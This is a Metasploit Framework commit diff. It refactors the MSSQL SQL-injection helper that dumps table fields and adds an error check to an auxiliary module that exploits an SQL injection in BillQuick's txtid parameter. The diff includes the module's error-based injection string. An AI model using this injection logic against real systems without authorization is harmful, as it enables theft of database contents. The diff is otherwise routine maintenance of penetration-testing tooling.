Address feedback from space-r7

red0xff · red0xff · commit 90937e6daa5b · 2022-05-06T00:31:20.000+02:00
diff --git a/lib/msf/core/exploit/sqli/mssqli/common.rb b/lib/msf/core/exploit/sqli/mssqli/common.rb
@@ -4,7 +4,7 @@
 #
 # This class represents a Microsoft SQL Server Injection object, its primary purpose is to provide the common queries
 # needed when performing SQL injection.
-# Instanciate it only if you get the query results of your SQL injection returned on the response.
+# Instantiate it only if you get the query results of your SQL injection returned on the response.
 #
 module Msf::Exploit::SQLi::Mssqli
   class Common < Msf::Exploit::SQLi::Common
@@ -123,23 +123,15 @@ def enum_table_columns(table_name)
     def dump_table_fields(table, columns, condition = '', num_limit = 0)
       return '' if columns.empty?
 
-      one_column = columns.length == 1
-      column_names = columns
-
-      if one_column
-        columns = "cast(isnull(#{columns.first},'#{@null_replacement}') as varchar(max))"
-        columns = @encoder[:encode].sub(/\^DATA\^/, columns) if @encoder
-      else
-        columns = columns.map do |col|
-          col = "cast(isnull(#{col},'#{@null_replacement}') as varchar(max))"
-          @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
-        end.join("+'#{@second_concat_separator}'+")
-      end
+      columns = columns.map do |col|
+        col = "cast(isnull(#{col},'#{@null_replacement}') as varchar(max))"
+        @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
+      end.join("+'#{@second_concat_separator}'+")
       unless condition.empty?
         condition = ' where ' + condition
       end
       num_limit = num_limit.to_i
-      limit = num_limit > 0 ? ' top ' + num_limit.to_s : ''
+      limit = num_limit > 0 ? " top #{num_limit}" : ''
       retrieved_data = nil
       identifier_generator = Rex::RandomIdentifier::Generator.new
       if @safe
diff --git a/modules/auxiliary/gather/billquick_txtid_sqli.rb b/modules/auxiliary/gather/billquick_txtid_sqli.rb
@@ -136,7 +136,9 @@ def run
     sqli = create_sqli(dbms: Msf::Exploit::SQLi::Mssqli::Common, opts: { safe: true, encoder: { encode: "'#{header}'+^DATA^+'#{footer}'", decode: ->(x) { x[/#{header}(.+?)#{footer}/mi, 1] } } }) do |payload|
       int = Rex::Text.rand_text_numeric(4)
       res = inject("'+(select '' where #{int} in (#{payload}))+'", viewstate, viewstategenerator, eventvalidation)
-      error_info(res)[/\\u0027(.+?)\\u0027/m, 1]
+      err_info = error_info(res)
+      print_error('Unexpected output from the server') if err_info.nil?
+      err_info[/\\u0027(.+?)\\u0027/m, 1]
     end
 
     # all inject strings taken from sqlmap runs, using error page method
